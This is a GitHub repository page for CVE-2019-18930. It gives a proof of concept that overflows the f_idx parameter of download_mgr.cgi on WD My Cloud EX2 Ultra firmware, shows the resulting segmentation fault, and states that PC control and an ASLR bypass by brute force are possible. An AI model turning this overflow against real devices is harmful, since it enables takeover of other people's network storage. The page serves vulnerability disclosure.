Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2019-18930/
CVE/CVE-2019-18930/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2019-18930

Information

Target      : WD My Cloud EX2 Ultra
Version     : 2.31.183, 2.31.195

Proof of Concept

root@MyCloudEX2Ultra cgi-bin # export REQUEST_METHOD=GET
root@MyCloudEX2Ultra cgi-bin # export QUERY_STRING=cmd=Downloads_Schedule_Info\&f_idx=`python -c 'print "a"*0x1f3 + "bbbb"'`
root@MyCloudEX2Ultra cgi-bin # ./download_mgr.cgi
I/O warning : failed to load external entity "/mnt/HD_a4/.systemfile/schedcfgs/aaaaaa (etc.) aaaaabbbb.xml"
Segmentation fault

https://youtu.be/x_YNsGnqG1o

Exploit

It is possible to control the PC register and bypass ASLR by doing brute force attack.